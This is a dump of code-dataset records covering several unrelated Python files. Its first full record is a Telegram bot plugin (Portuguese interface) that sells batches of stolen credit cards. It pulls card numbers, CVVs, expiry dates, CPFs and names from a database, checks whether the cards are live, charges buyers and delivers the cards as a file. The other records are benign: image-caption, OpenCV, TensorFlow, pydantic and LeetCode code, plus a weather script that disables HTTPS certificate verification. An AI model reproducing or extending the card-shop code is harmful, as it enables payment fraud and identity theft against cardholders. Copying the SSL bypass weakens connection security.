"gettext.translation", "line_number": 18, "usage_type": "call"}, {"api_name": "gettext.translation", "line_number": 19, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 60, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 61, "usage_type": "call"}, {"api_name": "argparse.FileType", "line_number": 62, "usage_type": "call"}]}
+{"seq_id": "28008213708", "text": "from io import BytesIO\n\nfrom pyrogram import Client, filters\nfrom pyrogram.types import CallbackQuery, InlineKeyboardButton, InlineKeyboardMarkup\n\nfrom config import ADMIN_CHAT\nfrom database import cur, save\nfrom plugins.users.buy_cc import chking\nfrom utils import (\n    create_mention,\n    get_info_wallet,\n    get_price,\n    insert_buy_sold,\n    insert_sold_balance,\n    lock_user_buy,\n    msg_mix_buy_user,\n    msg_mix_group_adm,\n)\n\n\n# Option: buying CCs of type Mix.\n@Client.on_callback_query(filters.regex(r\"^buy_cc mix$\"))\nasync def buy_mixes(c: Client, m: CallbackQuery):\n    levels_list = cur.execute(\n        \"SELECT price_name, price FROM prices WHERE price_type LIKE ?\", [\"mix\"]\n    ).fetchall()\n    levels_list.sort(key=lambda x: int(x[0]))\n\n    levels = []\n    for level, price in levels_list:\n        levels.append(\n            InlineKeyboardButton(\n                text=f\"Mix {level} | R$ {price}\", callback_data=f\"buy_cc mix {level}\"\n            )\n        )\n\n    organ = (\n        lambda data, step: [data[x : x + step] for x in range(0, len(data), step)]\n    )(levels, 2)\n    organ.append([InlineKeyboardButton(text=\"« Voltar\", callback_data=\"buy_cc\")])\n    kb = InlineKeyboardMarkup(inline_keyboard=organ)\n\n    await m.edit_message_text(\n        f\"\"\"🎲 Comprar Mix\n- Escolha abaixo a quantidade desejada.\n\n{get_info_wallet(m.from_user.id)}\"\"\",\n        reply_markup=kb,\n    )\n\n\n@Client.on_callback_query(filters.regex(r\"^buy_cc mix (?P<quantity>\\d+)\"))\n@lock_user_buy\nasync def buy_mix(c: Client, m: CallbackQuery):\n    user_id = m.from_user.id\n    balance: int = cur.execute(\"SELECT balance FROM users WHERE id = ?\", 
[user_id]).fetchone()[0]  # fmt: skip\n\n    type_cc = \"mix\"\n    quantity = int(m.matches[0][\"quantity\"])\n\n    do_check = quantity <= 10\n\n    price = await get_price(type_cc, quantity)\n\n    kb = InlineKeyboardMarkup(\n        inline_keyboard=[\n            [\n                InlineKeyboardButton(text=\"« Voltar\", callback_data=\"buy_cc\"),\n            ],\n        ]\n    )\n\n    if balance < price:\n        return await m.answer(\n            \"Você não possui saldo suficiente para esse item. Por favor, faça uma transferência.\",\n            show_alert=True,\n        )\n\n    ccs_list = cur.execute(\n        \"SELECT number, month, year, cvv, level, added_date, vendor, bank, country, cpf, name FROM cards WHERE pending = ? ORDER BY RANDOM() LIMIT ?\",\n        [False, quantity * 20 if do_check else quantity],\n    ).fetchall()\n\n    if len(ccs_list) < quantity:\n        return await m.answer(\n            \"❗️ Não há CCs disponíveis para o tamanho do mix requisitado.\",\n            show_alert=True,\n        )\n\n    sold_list = []\n\n    await m.edit_message_text(\"⏰ Aguarde, estou processando o seu pedido...\")\n\n    for tp in ccs_list:\n        (\n            number,\n            month,\n            year,\n            cvv,\n            level,\n            added_date,\n            vendor,\n            bank,\n            country,\n            cpf,\n            name,\n        ) = tp\n\n        card = \"|\".join([number, month, year, cvv])\n        is_pending = cur.execute(\n            \"SELECT pending FROM cards WHERE number = ?\", [tp[0]]\n        ).fetchone()\n        # If this returns None, the cc has already been sold or flagged die.\n        # If is_pending[0] is True, it is being checked by another process.\n        if not is_pending or is_pending[0]:\n            continue\n        cur.execute(\"UPDATE cards SET pending = 1 WHERE number = ?\", [number])\n        if do_check:\n            live_or_die = await chking(card)\n        else:\n            live_or_die = True, None\n\n        if live_or_die[0]:  # the cc came back live\n            sold_list.append(tp)\n            if len(sold_list) == quantity:\n                break\n            if do_check:\n                await m.edit_message_text(\n                    f\"⏰ Aguarde, estou processando o seu pedido... ({len(sold_list)}/{quantity})\"\n                )\n\n        elif live_or_die[0] is None:  # checker returned None for this cc type\n            cur.execute(\"UPDATE cards SET pending = False WHERE number = ?\", [tp[0]])\n\n        else:  # the cc came back die\n            cur.execute(\n                \"DELETE FROM cards WHERE number = ?\",\n                [tp[0]],\n            )\n            values = \"number, month, year, cvv, level, added_date, vendor, bank, country, cpf, name, plan\"\n            list_dies = tp + (type_cc,)\n            cur.execute(\n                f\"INSERT INTO cards_dies({values}) VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\",\n                list_dies,\n            )\n    # End of the for loop; the purchase is finished below.\n\n    # If the list of checked CCs is smaller than the requested quantity:\n    if len(sold_list) < quantity:\n        return await m.edit_message_text(\n            \"Infelizmente não consegui completar sua requisição de mix.\",\n            reply_markup=kb,\n        )\n\n    # If the list size matches the request (success), continue the purchase:\n    diamonds = (price / 100) * 8\n\n    base = await msg_mix_buy_user(\n        user_id,\n        quantity,\n        price,\n        diamonds,\n    )\n\n    to_message = []\n\n    for new_cc in sold_list:\n        (\n            number,\n            month,\n            year,\n            cvv,\n            level,\n            added_date,\n            vendor,\n            bank,\n            country,\n            cpf,\n            name,\n        ) = new_cc\n\n        cur.execute(\n            \"DELETE FROM cards WHERE number = ?\",\n            [number],\n        )\n\n        list_dados = new_cc + (user_id, f\"mix {quantity}\", True)\n\n        insert_buy_sold(list_dados)\n\n        to_message.append(\"|\".join([number, month, year, cvv, vendor, level, bank]))\n\n    insert_sold_balance(price, user_id, \"cards\", quantity=quantity)\n\n    await m.edit_message_text(base)\n\n    file = BytesIO()\n    file.name = f\"mix_{m.from_user.id}.txt\"\n    file.write(\"\\n\".join(to_message).encode())\n\n    await m.message.reply_document(file)\n\n    cur.execute(\n        \"UPDATE users SET balance = round(balance - ?, 2), balance_diamonds = round(balance_diamonds + ?, 2) WHERE id = ?\",\n        [price, diamonds, user_id],\n    )\n\n    await m.message.reply_text(\n        \"✅ Compra realizada com sucesso. Clique no botão abaixo para voltar para o menu principal.\",\n        reply_markup=kb,\n    )\n\n    mention = create_mention(m.from_user)\n    adm_msg = msg_mix_group_adm(\n        mention,\n        quantity,\n        price,\n        round(balance - price, 2),\n    )\n    await c.send_message(ADMIN_CHAT, adm_msg)\n    await c.send_document(ADMIN_CHAT, file)\n\n    save()\n", "repo_name": "RussoBratva/cyberbot", "sub_path": "plugins/users/buy_mix.py", "file_name": "buy_mix.py", "file_ext": "py", "file_size_in_byte": 6541, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pyrogram.Client", "line_number": 23, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 23, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 24, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 24, "usage_type": "name"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 32, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 40, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.get_info_wallet", "line_number": 47, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_callback_query", "line_number": 22, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.filters.regex", "line_number": 22, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 22, "usage_type": "name"}, {"api_name": "pyrogram.Client", "line_number": 54, "usage_type": "name"}, {"api_name": "pyrogram.types.CallbackQuery", "line_number": 54, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 56, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 56, "usage_type": "name"}, {"api_name": "utils.get_price", "line_number": 63, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardMarkup", "line_number": 65, "usage_type": "call"}, {"api_name": "pyrogram.types.InlineKeyboardButton", "line_number": 68, "usage_type": "call"}, {"api_name": "database.cur.execute", "line_number": 79, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 79, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 110, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 110, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 117, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 117, "usage_type": "name"}, {"api_name": "plugins.users.buy_cc.chking", "line_number": 119, "usage_type": "call"}, {"api_name": "database.cur.execute", "line_number": 133, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 133, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 136, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 136, "usage_type": "name"}, {"api_name": "database.cur.execute", "line_number": 142, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 142, "usage_type": "name"}, {"api_name": "utils.msg_mix_buy_user", "line_number": 158, "usage_type": "call"}, {"api_name": "database.cur.execute", "line_number": 182, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 182, "usage_type": "name"}, {"api_name": "utils.insert_buy_sold", "line_number": 189, "usage_type": "call"}, {"api_name": "utils.insert_sold_balance", "line_number": 193, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 197, "usage_type": "call"}, {"api_name": "database.cur.execute", "line_number": 203, "usage_type": "call"}, {"api_name": "database.cur", "line_number": 203, "usage_type": "name"}, {"api_name": "utils.create_mention", "line_number": 213, "usage_type": "call"}, {"api_name": "utils.msg_mix_group_adm", "line_number": 214, "usage_type": "call"}, {"api_name": "config.ADMIN_CHAT", "line_number": 220, "usage_type": "argument"}, {"api_name": "config.ADMIN_CHAT", "line_number": 221, "usage_type": "argument"}, {"api_name": "database.save", "line_number": 223, "usage_type": "call"}, {"api_name": "pyrogram.Client.on_callback_query", "line_number": 52, "usage_type": "call"}, {"api_name": "pyrogram.Client", "line_number": 52, "usage_type": "name"}, {"api_name": "pyrogram.filters.regex", "line_number": 52, "usage_type": "call"}, {"api_name": "pyrogram.filters", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.lock_user_buy", "line_number": 53, "usage_type": "name"}]}
+{"seq_id": "32670473195", "text": "\"\"\"\ndata generator module\nhttps://www.kaggle.com/fanbyprinciple/pytorch-image-captioning-with-flickr/notebook\n\"\"\"\nimport os\nimport re\nfrom typing import Callable, List, Tuple\n\nimport numpy as np\nimport spacy\nimport torch\nfrom PIL import Image\nfrom torch.nn.utils.rnn import pad_sequence\nfrom torch.utils.data import Dataset\n\nSPACY_ENG = spacy.load(\"en_core_web_sm\")\n# pylint: disable = wrong-import-position\nfrom image_caption.utils.data_utils import load_captions_data, train_val_split\n\n\n# pylint: disable = attribute-defined-outside-init\nclass Vocabulary:\n    \"\"\"Vocabulary building object\"\"\"\n\n    def __init__(self, standardize: Callable):\n        \"\"\"Initializer\n\n        Args:\n            standardize (Callable): utility function for standardizing the text inputs\n        \"\"\"\n\n        self.standardize = standardize\n\n        self.itos = {0: \"<PAD>\", 1: \"<SOS>\", 2: \"<EOS>\", 3: \"<UNK>\"}\n        self.stoi = {\"<PAD>\": 0, \"<SOS>\": 1, \"<EOS>\": 2, \"<UNK>\": 3}\n\n    def __len__(self):\n        return len(self.itos)\n\n    def tokenizer_eng(self, text: str):\n        \"\"\"creates a token vector from a literal phrase\"\"\"\n        text = self.standardize(text)\n        return [tok.text.lower() for tok in SPACY_ENG.tokenizer(text)]\n\n    def build_vocabulary(self, sentences: List[str]) -> None:\n        \"\"\"Builds integer key-word and vice-versa dictionaries\n\n        Args:\n            sentences (List[str]): list of phrases\n        \"\"\"\n        idx = 4\n        frequency = {}\n\n        for sentence in sentences:\n            for word in self.tokenizer_eng(sentence):\n                if word not in frequency:\n                    frequency[word] = 1\n                    self.itos[idx] = word\n                    self.stoi[word] = idx\n                    idx += 1\n                else:\n                    frequency[word] += 1\n        self.weights = np.ones(len(self.itos)) * len(sentences)\n        for idx in range(4, len(self.itos)):\n            word = self.itos[idx]\n            freq = frequency[word]\n            self.weights[idx] = freq\n        self.weights = 1 / self.weights ** (0.4)\n        self.weights = self.weights / min(self.weights)\n        # self.weights = (len(sentences) - self.weights) / self.weights\n        self.weights = np.expand_dims(np.expand_dims(self.weights, axis=0), axis=-1)\n\n    def numericalize(self, sentence: str) -> List[int]:\n        \"\"\"returns a vector of integers representing the individual words in a phrase\n\n        Args:\n            sentence (str): input string\n\n        Returns:\n            List[int]: vector representation of the string\n        \"\"\"\n        tokenized_text = self.tokenizer_eng(sentence)\n\n        return (\n            [self.stoi[\"<SOS>\"]]\n            + [\n                self.stoi[word] if word in self.stoi else self.stoi[\"<UNK>\"]\n                for word in tokenized_text\n            ]\n            + [self.stoi[\"<EOS>\"]]\n        )\n\n\n# pylint: disable = 
too-many-arguments\nclass CaptionDataset(Dataset):\n \"\"\"Prepares the flicker image caption dataset (base)\"\"\"\n\n def __init__(\n self,\n root_dir: str = \"datasets\",\n caption_file: str = \"Flickr8k.token.txt\",\n transform=None,\n seq_length: int = 25,\n split: str = \"train\",\n ) -> None:\n \"\"\"Initializes\n\n Args:\n root_dir (str, optional): Defaults to \"datasets\".\n caption_file (str, optional): name of the captions file.\n Defaults to \"Flickr8k.token.txt\".\n transform ([type], optional): Image transformations Defaults to None.\n seq_length (int, optional): max caption length for the dataset prep. Defaults to 25.\n split (str): data split to return\n \"\"\"\n self.transform = transform\n self.root_dir = root_dir\n\n caption_path = os.path.join(root_dir, caption_file)\n images_path = os.path.join(root_dir, \"Flicker8k_Dataset\")\n\n # Load the dataset\n captions_mapping, text_data = load_captions_data(\n caption_path, images_path, max_seq_length=seq_length\n )\n # strip specific characters from the string\n strip_chars = r\"!\\\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\n strip_chars = strip_chars.replace(\"<\", \"\")\n self.strip_chars = strip_chars.replace(\">\", \"\")\n # Build the vocab\n self.vocab = Vocabulary(self.custom_standardization)\n self.vocab.build_vocabulary(text_data)\n\n # Prepare the split # Returns vectorized captions\n train_data, valid_data = train_val_split(\n captions_mapping, self.vocab.numericalize\n )\n self.captions = train_data if split == \"train\" else valid_data\n\n self.images = list(self.captions.keys())\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, index):\n image = self.images[index]\n img = Image.open(image).convert(\"RGB\")\n\n if self.transform:\n img = self.transform(img)\n\n numericalized_captions = self.captions[image]\n caption_lens = [[len(caption)] for caption in numericalized_captions]\n\n return img, numericalized_captions, caption_lens\n\n def custom_standardization(self, input_string):\n \"\"\"custom function for removing certain specific substrings from the phrase\"\"\"\n return re.sub(f\"[{re.escape(self.strip_chars)}]\", \"\", input_string)\n\n\nclass Collate:\n \"\"\"process the list of samples to form a batch\"\"\"\n\n def __init__(self, pad_value: int, num_captions: int = 5):\n \"\"\"intialize\n\n Args:\n pad_value (int): value to pad the sequence with\n num_captions (int): number of captions for each image\n \"\"\"\n self.pad_value = pad_value\n self.num_captions = num_captions\n\n def __call__(self, batch: list) -> Tuple[torch.Tensor]:\n \"\"\"returns the batch from input lists\"\"\"\n imgs = [item[0].unsqueeze(0) for item in batch]\n img = torch.cat(imgs, dim=0)\n\n captions_tensor = []\n captions_lens = []\n for i in range(self.num_captions):\n targets = [item[1][i] for item in batch]\n targets = pad_sequence(\n targets, batch_first=True, padding_value=self.pad_value\n )\n captions_tensor.append(targets)\n lengths = [item[2][i] for item in batch]\n captions_lens.append(lengths)\n return (\n img,\n captions_tensor,\n torch.Tensor(captions_lens).to(dtype=torch.int32),\n )\n\n\nif __name__ == \"__main__\": # pragma: no cover\n dataset = CaptionDataset()\n\n out = dataset[100]\n\n out[0].show()\n print([dataset.vocab.itos[key] for key in np.array(out[1])])\n", "repo_name": "Anuj040/image_caption", "sub_path": "image_caption/utils/generator.py", "file_name": "generator.py", "file_ext": "py", "file_size_in_byte": 6657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, 
"dataset": "github-code", "pt": "41", "api": [{"api_name": "spacy.load", "line_number": 16, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 45, "usage_type": "name"}, {"api_name": "numpy.ones", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 95, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "image_caption.utils.data_utils.load_captions_data", "line_number": 123, "usage_type": "call"}, {"api_name": "image_caption.utils.data_utils.train_val_split", "line_number": 135, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 147, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 147, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 159, "usage_type": "call"}, {"api_name": "re.escape", "line_number": 159, "usage_type": "call"}, {"api_name": "torch.cat", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.nn.utils.rnn.pad_sequence", "line_number": 184, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 193, "usage_type": "call"}, {"api_name": "torch.int32", "line_number": 193, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 175, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 175, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}]} +{"seq_id": "33308334243", "text": "from typing import List, Optional\nfrom pydantic import BaseModel\nimport datetime\n\nclass ContentData(BaseModel):\n title: str\n url: str\n description: str\n created_at: Optional[datetime.datetime]\n created_by: Optional[str]\n updated_at: Optional[datetime.datetime]\n updated_by: Optional[str]\n\n\nclass Content(ContentData):\n id: str\n class Config:\n orm_mode = True\n\n\nclass ContentResult(BaseModel):\n count: int\n rows: List[Content]", "repo_name": "goFrendiAsgard/data-platform", "sub_path": "twpFastApp/schemas/content.py", "file_name": "content.py", "file_ext": "py", "file_size_in_byte": 465, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pydantic.BaseModel", "line_number": 5, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 9, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 9, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 11, "usage_type": "name"}, {"api_name": "datetime.datetime", "line_number": 11, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 12, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 23, "usage_type": "name"}]} +{"seq_id": "41561057876", "text": "import cv2\nimport numpy as np\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n#import pytesseract as py\nfolder_name = 'input_images'\ncwd = os.getcwd()\nfolder_path = 
os.path.join(cwd,folder_name)\nall_files = [f for f in listdir(folder_path) if isfile(join(folder_path, f))]\nfor file in all_files:\n image_path = os.path.join(folder_path,file)\n image=cv2.imread(image_path)\n imgGray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n imagedenoised=cv2.fastNlMeansDenoising(imgGray,None,3,7,11)\n imgThresh = cv2.adaptiveThreshold(imagedenoised, \n 255, \n cv2.ADAPTIVE_THRESH_GAUSSIAN_C, \n cv2.THRESH_BINARY_INV, \n 11, \n 2)\n npaContours, npaHierarchy = cv2.findContours(imgThresh,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n [intX, intY, intW, intH] = cv2.boundingRect(npaContours[0])\n cv2.rectangle(image,(intX, intY),(intX+intW,intY+intH),(0, 0, 255),2)\n for npaContour in npaContours:\n [intX, intY, intW, intH] = cv2.boundingRect(npaContour)\n cv2.rectangle(image,(intX, intY),(intX+intW,intY+intH),(0, 0, 255),2)\n \n \n cv2.imshow('Binary image',image)\n cv2.waitKey(0)", "repo_name": "ocr-intellectuals-123/ocr-engine", "sub_path": "ocr/Final.py", "file_name": "Final.py", "file_ext": "py", "file_size_in_byte": 1452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "os.getcwd", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.fastNlMeansDenoising", "line_number": 15, "usage_type": "call"}, {"api_name": "cv2.adaptiveThreshold", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.ADAPTIVE_THRESH_GAUSSIAN_C", "line_number": 18, "usage_type": "attribute"}, {"api_name": "cv2.THRESH_BINARY_INV", "line_number": 19, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 22, "usage_type": "call"}, {"api_name": "cv2.RETR_EXTERNAL", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cv2.boundingRect", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 26, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 27, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "29421986157", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nScript name: Weather.py\nAuthor: Nick\nDate: July 2018\nPurpose: Used to fetch and process weather data from ncas' Leeds Weather Data archive\n\"\"\"\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport os\nimport sys\nimport ssl\nimport pandas as pd\nimport datetime\nimport math\nimport cmath\nimport datetime as dt\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\ndef fetchWeatherData(date):\n if (not os.environ.get('PYTHONHTTPSVERIFY', '') 
and\n            getattr(ssl, '_create_unverified_context', None)):\n        ssl._create_default_https_context = ssl._create_unverified_context\n\n    yearstring = str(date.year)\n    monthstring = str(date.month) if date.month >= 10 else \"0\"+str(date.month)\n    daystring = str(date.day) if date.day >= 10 else \"0\"+str(date.day)\n\n    datestring = yearstring + \"-\" + monthstring + \"-\" + daystring\n    url = \"https://sci.ncas.ac.uk/leedsweather/Archive/CUSTOM-ARC-\"+datestring+\"-METRIC.csv\"\n    weatherdata = pd.read_csv(url, parse_dates=[0], index_col=[0])\n    ambientData = weatherdata[['Temp / °C','Humid%','Pressure / hPa']]\n    ambientData = ambientData.resample('H').mean()\n    ambientData = ambientData.iloc[[date.hour]]\n    ambientData = ambientData.round(1)\n\n    windData = weatherdata[['Wind / ms¯¹','Winddir / °']]\n    startTime = date.strftime(\"%H:%M:%S\")\n\n    timeplushour = date + datetime.timedelta(0,3600)\n    endTime = timeplushour.strftime(\"%H:%M:%S\")\n    windData = windData.between_time(startTime, endTime)\n    arrSpeed = windData['Wind / ms¯¹'].tolist()\n    arrDirection = windData['Winddir / °'].tolist()\n\n    wDirection, wSpeed = polarAverage(arrDirection, arrSpeed)\n\n    print(ambientData)\n\n    viewModel = {\n        'Temp / °C': ambientData.values[0][0]\n        ,'Humid%': ambientData.values[0][1]\n        ,'Pressure / hPa': ambientData.values[0][2]\n        ,'Wind / ms¯¹': wSpeed\n        ,'Winddir / °': wDirection\n    }\n\n    return viewModel\n\n# http://www.intellovations.com/2011/01/16/wind-observation-calculations-in-fortran-and-python/\ndef polarAverage(arrDirection, arrSpeed):\n    wind_vector_sum = None\n\n    for i in range(0, arrDirection.__len__()):  # was len-1, which silently dropped the last observation\n        direction = math.radians(arrDirection[i])\n        wind_polar = cmath.rect(arrSpeed[i], direction)\n        if wind_vector_sum is None:\n            wind_vector_sum = wind_polar\n        else:\n            wind_vector_sum += wind_polar\n\n    r, phi = cmath.polar(wind_vector_sum / arrDirection.__len__())\n\n    rwdir = math.degrees(phi) % 360\n    rwspd = r\n    # rwdir = int(round(int(round(math.degrees(phi) % 360)) / 10.0))\n    # rwspd = int(round(r * 10)) / 10.0\n\n    return '%2.0f' % rwdir, '%5.1f' % rwspd", "repo_name": "cemac/LivingLabDataApp", "sub_path": "Weather.py", "file_name": "Weather.py", "file_ext": "py", "file_size_in_byte": 2816, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "matplotlib.use", "line_number": 11, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "ssl._create_default_https_context", "line_number": 27, "usage_type": "attribute"}, {"api_name": "ssl._create_unverified_context", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 35, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 44, "usage_type": "call"}, {"api_name": "math.radians", "line_number": 69, "usage_type": "call"}, {"api_name": "cmath.rect", "line_number": 70, "usage_type": "call"}, {"api_name": "cmath.polar", "line_number": 76, "usage_type": "call"}, {"api_name": "math.degrees", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "29527872627", "text": "import numpy as np\r\nimport tensorflow as tf\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n# Training data\r\npressure = np.array([1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0])\r\ntemperature = np.array([20.0, 25.0, 30.0, 35.0, 40.0, 45.0, 50.0])\r\n\r\n# Split the data into training and test sets\r\nX_train, X_test, y_train, y_test = train_test_split(pressure, temperature, test_size=0.2, random_state=42)\r\n\r\n# Build the neural network model\r\nmodel = tf.keras.Sequential([\r\n    tf.keras.layers.Dense(10, input_shape=(1,), activation='relu'),\r\n    tf.keras.layers.Dense(1)\r\n])\r\n\r\n# Compile the model\r\nmodel.compile(optimizer='adam', loss='mean_squared_error')\r\n\r\n# Train the model\r\nmodel.fit(X_train, y_train, epochs=100, verbose=0)\r\n\r\n# Evaluate the model on the test set\r\nloss = model.evaluate(X_test, y_test)\r\nprint('Loss:', loss)\r\n\r\n# Predict the temperature for a new pressure\r\nnew_pressure = np.array([5.0])\r\npredicted_temperature = model.predict(new_pressure)\r\nprint('Predicted Temperature:', predicted_temperature)\r\n", "repo_name": "totobruh/IA-scientifique-", "sub_path": "import numpy as np.py", "file_name": "import numpy as np.py", "file_ext": "py", "file_size_in_byte": 1099, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 10, "usage_type": "call"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 13, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 13, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 15, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}]}
+{"seq_id": "2922621307", "text": "\"\"\"\nSource: https://leetcode.com/problems/01-matrix/description/\nDate: 2023/1/23\nSkill: Dynamic Programming\nRuntime: 504 ms, faster than 99.92%\nMemory Usage: 16.5 MB, less than 98.4%\nTime complexity:\nSpace complexity:\nConstraints:\n\n\"\"\"\nimport math\nfrom typing import List\nfrom collections import defaultdict, deque\nfrom functools import lru_cache, cache\n\nclass Solution:\n    def updateMatrix(self, mat: List[List[int]]) -> List[List[int]]:\n        m, n = len(mat), len(mat[0])\n\n        for r in range(m):\n            for c in range(n):\n                if mat[r][c] > 0:\n                    top = mat[r - 1][c] if r > 0 else math.inf\n                    left = mat[r][c - 1] if c > 0 else math.inf\n                    mat[r][c] = min(top, left) + 1\n\n        for r in range(m - 1, -1, -1):\n            for c in range(n - 1, -1, -1):\n                if mat[r][c] > 0:\n                    bottom = mat[r + 1][c] if r < m - 1 else math.inf\n                    right = mat[r][c + 1] if c < n - 1 else math.inf\n                    mat[r][c] = min(mat[r][c], bottom + 1, right + 1)\n\n        return mat", "repo_name": "RyanPioneer/Leetcode", "sub_path": "0501~1000/0542. 
